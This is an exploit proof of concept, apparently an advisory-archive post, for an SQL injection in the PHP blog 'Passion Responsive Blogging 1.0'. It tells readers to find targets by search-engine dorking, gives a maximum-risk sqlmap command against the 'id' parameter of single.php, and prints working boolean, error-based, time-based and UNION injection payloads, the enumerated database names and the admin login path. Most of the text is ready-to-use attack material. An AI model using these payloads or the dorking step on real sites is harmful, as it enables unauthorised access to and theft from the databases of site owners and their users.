=============================================================================================================================================
| # Title     : Passion Responsive Blogging 1.0 SQL injection Vulnerability                                                                 |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            |
| # Vendor    : https://code-projects.org/responsive-blog-site-in-php-with-source-code/                                                     |
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] use payload : /bmacblog/single.php?id=1  <==== inject here 

[+] E:\sqlmap>python sqlmap.py -u https://www.127.0.0.1.com/bmacblog/single.php?id=1 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 9732=9732-- jEuI

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 2112 FROM(SELECT COUNT(*),CONCAT(0x7176717a71,(SELECT (ELT(2112=2112,1))),0x717a6b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- WxeZ

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 4899 FROM (SELECT(SLEEP(5)))Buaa)-- cfil

    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: id=-6131' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7176717a71,0x7067554f5a4b435a75514461626d774c4f517045565a5a6d776e6e766276754e43576176794c5974,0x717a6b7071),NULL,NULL,NULL,NULL-- -
---
[23:52:32] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[23:52:32] [INFO] fetching database names
available databases [2]:
[*] bmac_blog_admin_db
[*] information_schema

[+] Login : /blogadmin


Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================